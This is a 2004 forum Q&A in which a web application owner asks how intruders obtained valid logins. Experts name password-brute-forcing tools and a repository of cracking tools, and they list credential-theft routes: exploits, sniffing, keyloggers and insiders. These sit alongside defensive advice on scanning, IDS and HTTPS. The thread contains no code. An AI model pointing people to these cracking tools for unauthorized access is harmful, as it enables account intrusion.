Solved

Password Hacking question

Posted on 2004-03-25
13
4,590 Views
Last Modified: 2010-04-11
Hello,

Early this morning, someone(s) gained unauthorized entry into our web application using valid login information.

We're trying to determine how they got the login information.

Are there any applications which hackers can use which will make repeated login attempts to an application's login page?
0
Comment
Question by:skbohler
  • 4
  • 4
  • 4
  • +1
13 Comments
 
LVL 6

Assisted Solution

by:bloemkool1980
bloemkool1980 earned 50 total points
Comment Utility
there are plenty of tools like that. But why would you need to know what tool ?
It is also very easy to write a script in perl that does it for you.
If I understand they did a password guessing attack and if this is true it means that you have very weak passwords and very easy to guess usernames.
I do not know any of those names for these kind of tools but http://packetstormsecurity.org has plenty.

0
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 75 total points
Comment Utility
Yes, plenty. I'd scan yourself with a few of the favorites, and see if you can see how they got in.
GFI languard - 30day trial
http://www.gfi.com/lannetscan/
Nessus - Free
http://www.nessus.org/  (nessus has a BF capibility)

Run MSBSA http://www.microsoft.com/technet/security/tools/mbsahome.mspx on the box and see what it recommends

Use those two to determine if you are vulnerable to some of the common and easily exploited flaws in IIS or SQL. Hacker's (actually crackers) can get in numerous ways.
1) they crack into a legitimate user of your system, and get their creditials off their pc
2) they exploit iis or sql and get in via 2000+ different ways
3) they "brute-force" usernames or passwords until they get a legit one
4) disgruntled former employee- or an insider in your company gives them access
5) your source code reveals or contains an "easy in" for the intruders

Get yourself an IDS system such as SNORT or a firewall that can export it's log's so that you may be able to corrilate an IP with the time of the login better. Firewall and AV are must for M$ products (I am assuming you are using iis, not apache)
GL!
-rich



0
 
LVL 6

Expert Comment

by:bloemkool1980
Comment Utility
webcracker is the most popular
http://www.securityfocus.com/tools/706
0
 
LVL 6

Expert Comment

by:bloemkool1980
Comment Utility
http://www.packetstormsecurity.org/Crackers/indexdate.shtml
Here there are many tools which could help you out.
0
 

Author Comment

by:skbohler
Comment Utility
Thanks for the initial responses.

Wouldn't the initial invalid attempts show up in both our IIS log files as hits to the login page?

-Steve
0
 

Author Comment

by:skbohler
Comment Utility
It looks like your responses are addressing attempts to hack into a server, not an application with an HTML login page. No?

-Steve
0
Get up to 2TB FREE CLOUD per backup license!

An exclusive Black Friday offer just for Expert Exchange audience! Buy any of our top-rated backup solutions & get up to 2TB free cloud per system! Perform local & cloud backup in the same step, and restore instantly—anytime, anywhere. Grab this deal now before it disappears!

 
LVL 38

Expert Comment

by:Rich Rumble
Comment Utility
They should- log such things. Like I said, many many ways to get a legit username and password. If they do scan your your server, and find it exploitable- then it's very likely this was their way in- then the gathered a few usernames and passwords... perhaps.
What has been listed are some tools that can look for expolits for your application (gfi nessus) and nessus also has a brute force capability. Social engineering is a fabulous way to get such information. With-out better forensic's there is no real way to tell how this info was obtained... too many variables at work here.
Hacking a person's computer- that uses your site, could contain a cached logon cred..
they could of worked for you previously, or they have someone on the inside... perhaps your application was written out-of-house, and a devloper used and account or back door to get in.. your imagination is the limit...
-rich
0
 

Author Comment

by:skbohler
Comment Utility
Since the log file shows only one attempt before gaining access through a valid login, it seems that they weren't using any software which keeps trying different things.

Other than learning of login information from a person, piece of paper, etc., are there other ways of obtaining login information? Can they "tap into" communication over the internet and filter out usernames and password strings?

Thanks again,
Steve
0
 
LVL 38

Expert Comment

by:Rich Rumble
Comment Utility
Not typically, they can't sniff the wire... they can get into a server with an exploit to IIS or Apache, even you app may reveal what it's looking for. Once you've gained access to a server (from being unpatched, or exploited), you can look around for valid usernames and passes in SQL or what ever data-base (the windows SAM) they may be stored in. In order to sniff (tap into) they need to be on the same subnet, and or in the same broadcast domain. You can sniff traffic while it's in transit to different places, if an employee of an ISP were to sniff his own traffic, he could easily gain such information if he/she were a "hop" that the info passed through. If you do a tracert to microsoft.com you "hop" through quite a few routers on different isp's and service providers, any one of those points (hops), any where in the world, could in theory "sniff" a communication such as username and password.

Encrypted communications are the best ways of thwarting such "sniffing". Https (http secure) SSL are the best ways to prevent this from happening-easily. Again, there are trojan's that install keyloggers, as well as URL monitoring- both with timestamps, so that the key strokes can be associated or  with a particular log-in to a url. This get's around the https solution. The possibilities are truly endless. For each cure or fix, there are other ways of obtaining the info.
So a user infected with a trojan, could unwittingly be giving a hacker this information, there is no real way to track down what has happened to you- again too many variables...
Your not Paranoid if everyone is really out to get you :) If you don't have a firewall, your asking to be hacked, if you don't run AV your bound to get infected (with M$ that is)

-rich
0
 

Author Comment

by:skbohler
Comment Utility
Thanks for your reply.

The username they used wasn't stored on our web server. Our SQL server database is on another database (on a shared server). Unfortunately I have no way of telling if they hacked into that.

We do have a firewall and have shut off their IP address for now.

Thanks!
0
 
LVL 6

Expert Comment

by:bloemkool1980
Comment Utility
anyhow I do not agree on your decision as richrumble proposed portscanners not tools that make web logins
sadly that you took that as a good answer!
0
 
LVL 38

Expert Comment

by:Rich Rumble
Comment Utility
Nessus indeed can make web login's- GFI can check for easy passwords if configured correctly. I think the split was fair, there are again too many variables to know for certain. Thanks.
-rich
0
 

Expert Comment

by:mgbyrne2004
Comment Utility
*** advertising removed by Netminder, Site Admin ***
0

Featured Post

How your wiki can always stay up-to-date

Quip doubles as a “living” wiki and a project management tool that evolves with your organization. As you finish projects in Quip, the work remains, easily accessible to all team members, new and old.
- Increase transparency
- Onboard new hires faster
- Access from mobile/offline

Join & Write a Comment

Even if you have implemented a Mobile Device Management solution company wide, it is a good idea to make sure you are taking into account all of the major risks to your electronic protected health information (ePHI).
This paper addresses the security of Sennheiser DECT Contact Center and Office (CC&O) headsets. It describes the DECT security chain comprised of “Pairing”, “Per Call Authentication” and “Encryption”, which are all part of the standard DECT protocol.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
This video demonstrates how to create an example email signature rule for a department in a company using CodeTwo Exchange Rules. The signature will be inserted beneath users' latest emails in conversations and will be displayed in users' Sent Items…

772 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

9 Experts available now in Live!

Get 1:1 Help Now